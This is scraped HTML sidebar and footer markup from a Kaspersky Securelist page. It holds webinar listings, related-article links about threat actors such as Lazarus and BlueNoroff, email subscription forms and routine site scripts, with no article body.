<time datetime="2020-06-17T13:00:00+00:00" class="c-card__event-date"> 17 Jun 2020, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__link">GReAT Ideas. 
Powered by SAS: malware attribution and next-gen IoT honeypots</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/marcopreuss/" > <span>Marco Preuss</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/kurtb/" > <span>Kurt Baumgartner</span></a> </li> <li> <a href="https://securelist.com/author/dandemeter/" > <span>Dan Demeter</span></a> </li> <li> <a href="https://securelist.com/author/yaroslavshmelev/" > <span>Yaroslav Shmelev</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-08-26T14:00:00+00:00" class="c-card__event-date"> 26 Aug 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__link">GReAT Ideas. 
Powered by SAS: threat actors advance on new fronts</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/ivankwiatkowski/" > <span>Ivan Kwiatkowski</span></a> </li> <li> <a href="https://securelist.com/author/maheryamout/" > <span>Maher Yamout</span></a> </li> <li> <a href="https://securelist.com/author/noushinshabab/" > <span>Noushin Shabab</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/felixaime/" > <span>Félix Aime</span></a> </li> <li> <a href="https://securelist.com/author/giampaolodedola/" > <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/santiago/" > <span>Santiago Pontiroli</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-07-22T14:00:00+00:00" class="c-card__event-date"> 22 Jul 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__link">GReAT Ideas. 
Powered by SAS: threat hunting and new techniques</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dimitrybestuzhev/" > <span>Dmitry Bestuzhev</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/arieljungheit/" > <span>Ariel Jungheit</span></a> </li> <li> <a href="https://securelist.com/author/fabioa/" > <span>Fabio Assolini</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">From the same authors</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/unveiling-lazarus-new-campaign/110888/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23163822/sl-abstract-malicious-binary-code-1200-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23163822/sl-abstract-malicious-binary-code-1200-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a 
href="https://securelist.com/unveiling-lazarus-new-campaign/110888/" class="c-card__link">A cascade of compromise: unveiling Lazarus’ new campaign</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" class="c-card__link">Following the Lazarus group by tracking DeathNote campaign</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bluenoroff-methods-bypass-motw/108383/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131757/abstract_random_red_code-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131757/abstract_random_red_code-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header 
class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bluenoroff-methods-bypass-motw/108383/" class="c-card__link">BlueNoroff introduces new methods bypassing MoTW</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/24163735/kimsuky-gold-dragon_featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/24163735/kimsuky-gold-dragon_featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" class="c-card__link">Kimsuky’s GoldDragon cluster and its C2 operations</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12134602/abstract_fintech-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12134602/abstract_fintech-800x450.jpg" data-srcset="" srcset="" /> </a> <div 
class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" class="c-card__link">The BlueNoroff cryptocurrency hunt is still on</a></h3> </header> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="c-widget-subscribe js-sticky-widget"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <script type="text/javascript"></script> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2353393760' ><div id='gf_2353393760' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2353393760' id='gform_2353393760' class='subscribe-mc' action='/lazarus-threatneedle/100803/#gf_2353393760' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2353393760' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2353393760_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2353393760_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2353393760_3' type='hidden' 
class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2353393760_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2353393760_11_2_1' /> <label for='choice_2353393760_11_2_1' id='label_2353393760_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_2353393760' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' 
name='gform_target_page_number_11' id='gform_target_page_number_2353393760_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2353393760_11' value='1' /> <input type='hidden' name='gform_random_id' value='2353393760' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js" value="21"/><script>document.getElementById( "ak_js_2" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2353393760' id='gform_ajax_frame_2353393760' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2353393760, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2353393760').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2353393760');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2353393760').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! 
is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2353393760').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2353393760').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2353393760').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2353393760').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2353393760_11').val();gformInitSpinner( 2353393760, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2353393760, current_page]);window['gf_submitting_2353393760'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2353393760').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2353393760').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2353393760]);window['gf_submitting_2353393760'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2353393760').text());}, 50);}else{jQuery('#gform_2353393760').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2353393760, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">In the same category</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers 
c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers 
c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/careto-is-back/114942/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what’s new after 10 years of silence?</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers 
c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__link">APT trends report Q3 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092503/NEXT_310x420_EN_1.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a 
class="c-form--float-labels js-float-labels"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1719933889' ><div id='gf_1719933889' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1719933889' id='gform_1719933889' class='subscribe-mc' action='/lazarus-threatneedle/100803/#gf_1719933889' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1719933889' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1719933889_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1719933889_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1719933889_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1719933889_2'><div class='gchoice gchoice_11_2_1'> <input 
class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1719933889_11_2_1' /> <label for='choice_1719933889_11_2_1' id='label_1719933889_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_1719933889' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1719933889_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1719933889_11' value='1' /> <input type='hidden' name='gform_random_id' value='1719933889' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input 
type="hidden" id="ak_js_4" name="ak_js" value="173"/><script>document.getElementById( "ak_js_4" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1719933889' id='gform_ajax_frame_1719933889' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1719933889, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1719933889').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1719933889');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1719933889').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! 
is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1719933889').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1719933889').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1719933889').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1719933889').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1719933889_11').val();gformInitSpinner( 1719933889, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1719933889, current_page]);window['gf_submitting_1719933889'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1719933889').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1719933889').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1719933889]);window['gf_submitting_1719933889'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1719933889').text());}, 50);}else{jQuery('#gform_1719933889').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1719933889, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> </div><!-- /.c-modal__main --> </div><!-- /.c-modal --> </div><!-- /.c-modal__wrapper --> <script type="text/javascript"> if ( typeof _recaptcha_wordpress_savedcomment != 'undefined') { document.getElementById('comment').value = 
_recaptcha_wordpress_savedcomment; } </script><script type="text/javascript" src="https://kasperskycontenthub.com/securelist/wp-content/plugins/kaspersky-embeds/js/scripts.js?ver=1.0" id="kspr_embeds-js"></script> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?render=explicit&ver=202124050927" id="kaspersky-dynamic-gravity-forms-google-recaptcha-js"></script> <script type="text/javascript" id="crayon_js-js-extra"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-dynamic-gravity-forms-main-js-extra"> /* <![CDATA[ */ var kasperskyDynamicaReCaptchaData = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-omniture-js-extra"> /* <![CDATA[ */ var kaspersky = {"pageName":"Kaspersky Securelist","pageType":"blog","platformName":"Micro Site","businessType":"b2c","siteLocale":"en-GLOBAL"}; /* ]]> */ </script> <script type="text/javascript" id="wp-autosearch-script-js-extra"> /* <![CDATA[ */ var wp_autosearch_config = 
{"autocomplete_taxonomies":{"0":"category"},"split_results_by_type":"true","search_title":"true","search_content":"false","search_terms":"false","search_exactonly":"true","order_by":"title","order":"DESC","search_comments":"false","search_tags":"false","no_of_results":"5","description_limit":"100","title_limit":"50","excluded_ids":{},"excluded_cats":{"0":0},"full_search_url":"https:\/\/kasperskycontenthub.com\/securelist\/?s=%q%","min_chars":"3","ajax_delay":"200","cache_length":"200","autocomplete_sortorder":"posts","thumb_image_display":"false","thumb_image_width":"50","thumb_image_height":"50","get_first_image":"true","force_resize_first_image":"true","thumb_image_crop":"true","default_image":"https:\/\/kasperskycontenthub.com\/securelist\/wp-content\/plugins\/wp-autosearch\/assert\/image\/default.png","search_image":"","display_more_bar":"false","display_result_title":"false","enable_token":"true","custom_css":"","custom_js":"","try_full_search_text":"Search more...","no_results_try_full_search_text":"No Results!","show_author":"false","show_date":"false","description_result":"false","color":{"results_even_bar":"E8E8E8","results_odd_bar":"FFFFFF","results_even_text":"000000","results_odd_text":"000000","results_hover_bar":"5CCCB2","results_hover_text":"FFFFFF","seperator_bar":"2D8DA0","seperator_hover_bar":"6A81A0","seperator_text":"FFFFFF","seperator_hover_text":"FFFFFF","more_bar":"5286A0","more_hover_bar":"4682A0","more_text":"FFFFFF","more_hover_text":"FFFFFF","box_border":"57C297","box_background":"FFFFFF","box_text":"000000"},"title":{"page":"Pages","post":"Posts","webinars":"Webinars"},"post_types":{"0":"page","1":"post","2":"webinars"},"nonce":"f5627bf19c","ajax_url":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="securelist-script-js-extra"> /* <![CDATA[ */ var securelist2020Data = 
